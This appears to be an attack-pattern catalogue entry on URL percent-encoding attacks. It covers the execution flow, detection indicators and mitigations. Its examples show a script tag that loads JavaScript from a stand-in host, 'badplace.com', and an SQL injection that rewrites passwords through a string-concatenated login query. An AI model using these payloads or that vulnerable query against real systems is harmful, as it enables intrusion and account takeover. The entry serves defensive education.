This attack targets the encoding of the URL. An attacker can take
advantage of the multiple way of encoding an URL and abuse the
interpretation of the URL. An URL may contain special character that need
special syntax handling in order to be interpreted. Special characters are
represented using a percentage character followed by two digits representing
the octet code of the original character (%HEX-CODE). For instance US-ASCII
space character would be represented with %20. This is often referred as
escaped ending or percent-encoding. Since the server decodes the URL from
the requests, it may restrict the access to some URL paths by validating and
filtering out the URL requests it received. An attacker will try to craft an
URL with a sequence of special characters which once interpreted by the
server will be equivalent to a forbidden URL. It can be difficult to protect
against this attack since the URL can contain other format of encoding such
as UTF-8 encoding, Unicode-encoding, etc. The attacker could also subvert
the meaning of the URL string request by encoding the data being sent to the
server through a GET request. For instance an attacker may subvert the
meaning of parameters used in a SQL request and sent through the URL string
(See Example section).
Attack Execution Flow
The attacker accesses the server using a specific
URL.
The attacker tries to encode some special
characters in the URL. The attacker finds out that
some characters are not filtered properly.
The attacker crafts a malicious URL string request
and sends it to the server.
The server decodes and interprets the URL string.
Unfortunately since the input filtering is not done
properly, the special characters may have harmful
consequences.
Attack Prerequisites
The application should accepts and decodes URL input.
The application performs insufficient filtering/canonicalization on the
URLs.
Typical Likelihood of Exploit
Likelihood: High
Methods of Attack
Injection
Protocol Manipulation
API Abuse
Examples-Instances
Description
Attack Example: URL Encodings in IceCast MP3 Server.
The following type of encoded string has been known traverse
directories against the IceCast MP3 server9:
HTML execution: <script
src="http://www.badplace.com/nasty.js"></script>
From "URL encoded attacks", by Gunter Ollmann -
http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html
Description
SQL Injection
Original database query in the example file - "login.asp": SQLQuery =
"SELECT preferences FROM logintable WHERE userid='" &
Request.QueryString("userid") & "' AND password='" &
Request.QueryString("password") & "';"
Executed database query: SELECT preferences FROM logintable WHERE
userid='bob'; update logintable set password='0wn3d';
From "URL encoded attacks", by Gunter Ollmann -
http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html
Attacker Skills or Knowledge Required
Skill or Knowledge Level: Low
An attacker can try special characters in the URL and bypass the URL
validation.
Skill or Knowledge Level: Medium
The attacker may write a script to defeat the input filtering
mechanism.
Probing Techniques
Description
An attacker can manually inject special characters in the URL string
request and observe the results of the request.
Description
Custom scripts can also be used. For example, a good script for
verifying the correct interpretation of UTF-8 encoded characters can be
found at
http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt
Description
Automated tools such as fuzzer can be used to test the URL decoding
and filtering.
Indicators-Warnings of Attack
Description
If the first decoding process has left some invalid or blacklisted
characters, that may be a sign that the request is malicious.
Description
Traffic filtering with IDS (or proxy) can detect requests with
suspicious URLs. IDS may use signature based identification to reveal
such URL based attacks.
Obfuscation Techniques
Description
Sometime the percent escaping can be used to obfuscate the attack
itself.
Description
Alternative method of data encoding can be used.
Description
Obfuscation technique such as IP address encoding can also be used
(See reference section : "URL encoded attacks", by Gunter
Ollmann).
Solutions and Mitigations
Refer to the RFCs to safelly decode URL.
Regular expression can be used to match safe URL patterns. However, that
may discard valid URL requests if the regular expression is too
restrictive.
There are tools to scan HTTP requests to the server for valid URL such as
URLScan from Microsoft
(http://www.microsoft.com/technet/security/tools/urlscan.mspx).
Any security checks should occur after the data has been decoded and
validated as correct data format. Do not repeat decoding process, if bad
character are left after decoding process, treat the data as suspicious, and
fail the validation process.
Assume all input is malicious. Create a white list that defines all valid
input to the software system based on the requirements specifications. Input
that does not match against the white list should not be permitted to enter
into the system. Test your decoding process against malicious input.
Be aware of the threat of alternative method of data encoding and
obfuscation technique such as IP address encoding. (See related guideline
section)
When client input is required from web-based forms, avoid using the "GET"
method to submit data, as the method causes the form data to be appended to
the URL and is easily manipulated. Instead, use the "POST method whenever
possible.
Description
